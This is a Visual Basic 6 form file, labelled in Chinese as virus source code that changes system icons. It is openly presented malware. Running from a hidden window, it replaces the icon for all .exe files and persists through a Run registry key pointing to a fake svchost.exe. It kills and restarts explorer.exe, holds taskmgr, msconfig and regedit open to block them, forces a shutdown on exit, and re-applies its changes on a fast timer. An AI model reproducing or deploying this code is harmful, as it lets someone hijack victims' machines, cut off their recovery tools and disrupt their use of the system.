form1.frm

改系统图标的病毒源代码

VERSION 5.00
Begin VB.Form Form1 
   BorderStyle     =   0  'None
   Caption         =   "Form1"
   ClientHeight    =   1425
   ClientLeft      =   5115
   ClientTop       =   3915
   ClientWidth     =   2235
   LinkTopic       =   "Form1"
   ScaleHeight     =   1425
   ScaleWidth      =   2235
   ShowInTaskbar   =   0   'False
   Visible         =   0   'False
   Begin VB.Timer Timer1 
      Interval        =   10
      Left            =   0
      Top             =   3120
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Dim WIT As New WshShell
Dim s As String
Dim objWMIService As Object
Dim colProcessList
Dim objProcess As Object
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\xm.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set colProcessList = objWMIService.ExecQuery("select * FROM Win32_Process")
    Dim mProcID As Long
    For Each objProcess In colProcessList
        If LCase(Trim(objProcess.Name)) = "explorer.exe" Then
            mProcID = OpenProcess(1&, -1&, objProcess.ProcessID)
            '强行终止test进程
            TerminateProcess mProcID, 0&
        End If
    Next
Shell GetWindowsPath() & "\explorer.exe"

Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2

End Sub

Private Sub Form_Unload(Cancel As Integer)
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\xm.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2

Shell "shutdown -s", vbNormalFocus

End Sub

Private Sub Timer1_Timer()
If WIT.RegRead("HKEY_CLASSES_ROOT\exefile\DefaultIcon\") <> App.path & "\xm.ico" Then

Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\xm.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2

End If


End Sub